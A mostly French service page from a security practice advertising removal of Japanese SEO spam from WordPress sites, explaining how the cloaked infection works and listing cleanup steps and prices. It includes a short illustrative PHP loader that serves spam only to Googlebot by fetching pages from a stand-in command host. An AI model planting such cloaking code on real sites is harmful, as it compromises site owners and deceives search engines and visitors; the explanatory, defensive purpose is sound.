Japanese SEO spam · cloaked · cleaned
Japanese SEO spam removal.
Suppression manuelle de l'injection de spam SEO japonais. Nettoyage fichiers et base de données. Purge du sitemap. Vecteur d'entrée identifié. Demandes de réexamen soumises. Forfait $279.
Mechanism
Ce qu'est le « spam SEO japonais », techniquement.
Un attaquant plante un loader PHP sur votre site (généralement dans wp-content/plugins/ ou wp-content/uploads/). Le loader génère des milliers de pages synthétiques avec des mots-clés japonais et des titres de produits japonais. Il réécrit votre sitemap pour que Googlebot les trouve. Les vrais visiteurs ne voient jamais le spam — le loader vérifie le User-Agent et sert votre site normal aux humains.
Le temps que vous le remarquiez, Google a indexé des centaines ou milliers d'URL en japonais sur votre domaine. Search Console envoie un avertissement de sécurité par e-mail. Les positions chutent. Le libellé « Piraté : injection de contenu » apparaît dans Search Console.
01 <?php 02 // Serve spam only to Googlebot. Real users see the normal site. 03 if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) { 04 $payload = file_get_contents('https://spam-c2.example/jp/' . $_SERVER['REQUEST_URI']); 05 echo $payload; 06 exit; 07 }
What I remove
Chaque endroit où cette infection se cache.
File loaders
PHP obfusqué dans plugins, mu-plugins, thèmes et uploads. Nous lisons les diffs, pas les noms de fichiers.
Database
Contenu spam injecté dans wp_posts, entrées wp_options autoload malveillantes, wp_usermeta suspect.
Plan du site
Entrées de sitemap synthétiques générées supprimées ; sitemap propre régénéré et resoumis à Search Console.
Htaccess
Règles de réécriture .htaccess et nginx qui redirigent Googlebot ou des chemins spécifiques — annulées.
Admin users
Comptes administrateur dormants créés par le loader — supprimés. Tous les secrets admin restants sont rotés.
Entry vector
Plugin vulnérable ou identifiant volé identifié et fermé. Sans cette étape, le même trou est réutilisé en quelques semaines.
Tarifs
Cleanup
$279
flat, one-time, per site
Manual cleanup, entry-vector identification, written forensic report.
Démarrer un nettoyageMonitoring
$29 / mo
per site, cancel any time
Surveillance continue, durcissement, un nettoyage par an inclus.
Se protégerPart of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.
Voir tous les services →E-mail [email protected] or use the contact form.